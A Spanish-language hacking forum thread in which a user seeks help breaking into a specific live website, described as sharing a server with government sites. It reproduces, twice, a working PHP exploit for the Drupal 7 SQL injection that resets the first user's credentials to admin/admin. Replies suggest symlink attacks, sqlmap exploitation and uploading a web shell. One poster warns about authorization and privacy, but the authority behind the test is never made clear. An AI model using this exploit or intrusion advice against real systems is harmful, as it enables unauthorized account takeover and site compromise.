[SOLUCIONADO] Con Pentesting a una Web

Iniciado por D00mR3D, Junio 16, 2015, 09:12:32 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 16, 2015, 09:12:32 PM Ultima modificación: Junio 18, 2015, 06:50:46 AM por blackdrake
Hola,

Quisiera saber, cómo vulnerar una página para un pentesting que se me ha pedido pero que no le encuentro el error, ya sea FPD,Sql injection, etc...
El servidor cuenta con varios dominios, pero los otros dominios son Drupal 7.
Les agradecería si me ayudaran, lo necesito lo más antes posible, y si le encuentran la vulenrabilidad les agradezco, sino, con sólo decirme que puedo hacer basta.


Gracias de nuevo.

Existe un exploit para esa versión

Código: php
<?php
/********************************************************
* Drupal 7 SQL Injection vulnerability demo
* Created by Milan Kragujevic (of milankragujevic.com)
* Read more at http://milankragujevic.com/post/66
* This will change the first user's username to admin
* and their password to admin
* Change $url to the website URL
********************************************************/
$url = '[URL HERE]'; // URL of the website (http://domain.com/)
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}


Espero que te sirva.

Saludos!
ANTRAX


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Existe un exploit para esa versión

Código: php
<?php
/********************************************************
* Drupal 7 SQL Injection vulnerability demo
* Created by Milan Kragujevic (of milankragujevic.com)
* Read more at http://milankragujevic.com/post/66
* This will change the first user's username to admin
* and their password to admin
* Change $url to the website URL
********************************************************/
$url = '[URL HERE]'; // URL of the website (http://domain.com/)
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}


Espero que te sirva.

Saludos!
ANTRAX

Hola Antrax,
Deberas, muchsa gracias por responder.
Pero ahora, ¿Si esa versión no es vulnerable? ¿Qué me recomiendas? ¿O ya la probaste tú?  :O
PD: Ahora que veo, ese exploit ya lo había intentado, pero no me funcionó,¿Será que lo ejecuté mal?.
En URL HERE puse el sitio sin los [], pero no funciono :O.


Podes intentar varias cosas.
Ver si esta en un host compartido e intentar symlink.
Ver que servicios y puertos tiene abierto el server para ver si alguno es vulnerable

Vulnerar un sitio no siempre depende del sitio en si.

Saludos!
ANTRAX


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Podes intentar varias cosas.
Ver si esta en un host compartido e intentar symlink.
Ver que servicios y puertos tiene abierto el server para ver si alguno es vulnerable

Vulnerar un sitio no siempre depende del sitio en si.

Saludos!
ANTRAX

Entonces podría intentarlo, y si me surge una duda,¿Me ayudas?
:)

Claro bro, para eso estamos. Solo posteala en el foro y te ayudaremos entre todos!

Saludos!
ANTRAX


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Claro bro, para eso estamos. Solo posteala en el foro y te ayudaremos entre todos!

Saludos!
ANTRAX

Muchas gracias, entonces voy a intentarle, si deseas, pones como "solucionado" y ya cuando pruebe, pues coloco la duda en esta misma sección.
Saludos bro :).

Por lo visto andas disparanado balas sin tener una mira, antes de todo inicia el proceso del pentesting iniciando desde 0 es decir.

Registro de Dominio
Información de servicios. (Vulnerables no vulnerables)
Reverse IP (Si hubieran mas bichos por ahí trata de escalar)
Escaneo manual, identifica posibles variables de explotación o ataques.
Escaneo automático si tienes la posibilidad.
Arma una tabla de criticidad.
(Solo por nombrar algunos ;). )

OJO: "Si te han contratado" estas cometiendo un grave error! al compartir el enlace del sitio que estas haciendo la prueba, podria acarrearte algun problema por la privacidad que tu debes de tener no es soltar y lanzar a todos. Del mismo modo antes de lanzar algun exploit o cualquier cosa valida si en los TOS es posible realizar ello sin ninguna limitante, es decir si no tiene que tener conocimiento la contraparte, no vaya a ser una DoS que lanzes y el sitio necesite estar online 24x7.

Regards
Snifer

No seas un mono con Gillet !

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por lo visto andas disparanado balas sin tener una mira, antes de todo inicia el proceso del pentesting iniciando desde 0 es decir.

Registro de Dominio
Información de servicios. (Vulnerables no vulnerables)
Reverse IP (Si hubieran mas bichos por ahí trata de escalar)
Escaneo manual, identifica posibles variables de explotación o ataques.
Escaneo automático si tienes la posibilidad.
Arma una tabla de criticidad.
(Solo por nombrar algunos ;). )

OJO: "Si te han contratado" estas cometiendo un grave error! al compartir el enlace del sitio que estas haciendo la prueba, podria acarrearte algun problema por la privacidad que tu debes de tener no es soltar y lanzar a todos. Del mismo modo antes de lanzar algun exploit o cualquier cosa valida si en los TOS es posible realizar ello sin ninguna limitante, es decir si no tiene que tener conocimiento la contraparte, no vaya a ser una DoS que lanzes y el sitio necesite estar online 24x7.

Regards
Snifer

No seas un mono con Gillet !

Hola, gracias por tu comentario.
Compartí el sitio, para ver qué le podían hallar que no le hallara yo, pero bueno, además, de que le he hecho escaneo de puertos, y todos los tiene cerrados a excepción del puerto 80, claro, con el Nmap.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Claro bro, para eso estamos. Solo posteala en el foro y te ayudaremos entre todos!

Saludos!
ANTRAX
Hola Antrax,
he escaneado los puertos de la web con Nmap y me muestra que todos están cerrados menos el puerto 80, que es el servicio de http.
¿Alguna otra idea?...Creí que me iba a lanzar más puertos abiertos, pero me muestra sólo el 80 abierto, aunque le haya hecho escaneo profundo y demás.


@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ,  el sitio que intentas vulnerar ya fue defaceado el 11/14, de hecho sufrio un mass defacement el servidor entero con varias webs gubernamentales, eso se puede ver en los mirrors de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, así que muy probablemente tenga un gran BUG para acceder a todo.

Saludos!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ,  el sitio que intentas vulnerar ya fue defaceado el 11/14, de hecho sufrio un mass defacement el servidor entero con varias webs gubernamentales, eso se puede ver en los mirrors de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, así que muy probablemente tenga un gran BUG para acceder a todo.

Saludos!
Eso veo, acabo de encontrarle una Sql injection a uno de sus dominios(Que no es drupal, los demás si) pero no es el principal....Lo estoy inyectando haber que..
¿De casualidad no sabes qué vulnerabilidad tiene en sí? acabo de ver en Zone-h, y sí, lo han hackeado 2 personas, pero no sé con qué vulnerabilidad.
Te lo agradezco  ;D

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la verdad no e testeado el sitio pero si encontraste una SQLi explotala y trata de subir shell en ese dominio (directorio), ya que si pudieron hacer un mass defacement es porque el servidor es de kernel rooteable o el openbase_dir() esta OFF o tiene algún fallo en la config. de Apache que permite ver todo los directorios web.

Saludos!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la verdad no e testeado el sitio pero si encontraste una SQLi explotala y trata de subir shell en ese dominio (directorio), ya que si pudieron hacer un mass defacement es porque el servidor es de kernel rooteable o el openbase_dir() esta OFF o tiene algún fallo en la config. de Apache que permite ver todo los directorios web.

Saludos!

Ya casi da los resultados la expltoación del sqlmap, voy a ver y te comento.
Gracias!  :D

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cierro tema pues está solucionado, además, no puedes compartir los datos que sacarás explotando ese sqli.

Si tienes otra duda, crea otro

Saludos